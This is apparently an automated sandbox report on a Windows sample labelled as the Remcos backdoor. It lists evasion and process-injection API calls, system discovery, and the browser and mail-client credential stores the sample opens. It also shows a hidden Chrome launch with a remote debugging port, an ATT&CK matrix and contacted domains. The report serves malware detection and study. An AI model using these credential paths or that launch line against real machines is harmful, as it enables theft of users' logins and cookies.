                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043A66D
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00433B54
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00433CE7 SetUnhandledExceptionFilter,0_2_00433CE7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_028360E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_028360E2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02832639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02832639
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02832B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02832B1C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000B299 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000B299
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000D8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000D8D1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000AFD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000AFD4

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,0_2_00417245
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00410F36
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00418764 mouse_event,0_2_00418764
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\fliqhlfdwqgtkvturvhs"Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\qgniidqfkyyfmjhyagcumhn"Jump to behavior
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4573276509.0000000003398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4573276509.0000000003398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2147322433.0000000000820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4573276509.0000000003398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00433E1A cpuid 0_2_00433E1A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoA,0_2_0040E679
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004510CA
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_004470BE
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004511F3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004512FA
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004513C7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004475A7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00450A8F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450D52
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450D07
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450DED
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00450E7A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00404915 GetLocalTime,CreateEventA,CreateThread,0_2_00404915
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041A7B2 GetComputerNameExW,GetUserNameW,0_2_0041A7B2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0044801F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0041739B GetVersionExW,4_2_0041739B
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0_2_0040B21B
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 0_2_0040B335
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: \key3.db 0_2_0040B335
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: ESMTPPassword 5_2_004033F0
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 5_2_00402DB3
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 5_2_00402DB3
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR

                      Remote Access Functionality

Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: cmd.exe 0_2_00405042
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 13 Command and Scripting Interpreter | 1 Windows Service | 1 Bypass User Account Control | 2 Obfuscated Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement |
| Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | Logon Script (Windows) | 1 Extra Window Memory Injection | 1 Software Packing | 2 Credentials in Registry | 1 System Service Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Access Token Manipulation | 1 DLL Side-Loading | 3 Credentials In Files | 3 File and Directory Discovery | Distributed Component Object Model | 111 Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Windows Service | 1 Bypass User Account Control | LSA Secrets | 38 System Information Discovery | SSH | 3 Clipboard Data | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 222 Process Injection | 1 Extra Window Memory Injection | Cached Domain Credentials | 31 Security Software Discovery | VNC | GUI Input Capture | 14 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 222 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
[Behavior graph: ID: 1584334; Sample: 17360626254f6ab0798f0d71fe8...; Startdate: 05/01/2025; Architecture: WINDOWS; Score: 100]

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | 75% | Virustotal | |
| 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | 71% | ReversingLabs | Win32.Backdoor.Remcos |
| 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | 100% | Avira | BDS/Backdoor.Gen |
| 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://tls-tunnel-check.googlezip.net/connect2 | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| svc.ms-acdc-teams.office.com | 52.123.243.81 | true | false | | high |
| chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high |
| geoplugin.net | 178.237.33.50 | true | false | | high |
| ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high |
| googlehosted.l.googleusercontent.com | 142.250.185.129 | true | false | | high |
| clients2.googleusercontent.com | unknown | unknown | false | | high |
| bzib.nelreports.net | unknown | unknown | false | | high |
| ntp.msn.com | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.js | false | | high |
| https://assets.msn.com/bundles/v1/edgeChromium/latest/common.2ab67b7067792da4ff61.js | false | | high |
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                https://support.google.com/chrome/?p=blockedbchrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/-#chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tls-tunnel-check.googlezip.net/connect2chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://drive-daily-1.corp.google.com/chrome.exe, 00000003.00000003.2195846285.00006B3C00438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/n9chrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://drive-daily-5.corp.google.com/chrome.exe, 00000003.00000003.2195846285.00006B3C00438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://duckduckgo.com/favicon.icochrome.exe, 00000003.00000003.2227862312.00006B3C00D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/L-chrome.exe, 00000003.00000003.2242455265.00006B3C02130000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://anglebug.com/3078chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://anglebug.com/7553chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://anglebug.com/5375chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://anglebug.com/5371chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://geoplugin.net/17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2145694098.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2146564950.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2144560782.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2139350448.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2138314383.0000000000836000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2145241293.0000000000838000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2139177976.0000000000836000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://anglebug.com/4722chrome.exe, 00000003.00000003.2203551199.00006B3C0037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203513775.00006B3C00FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
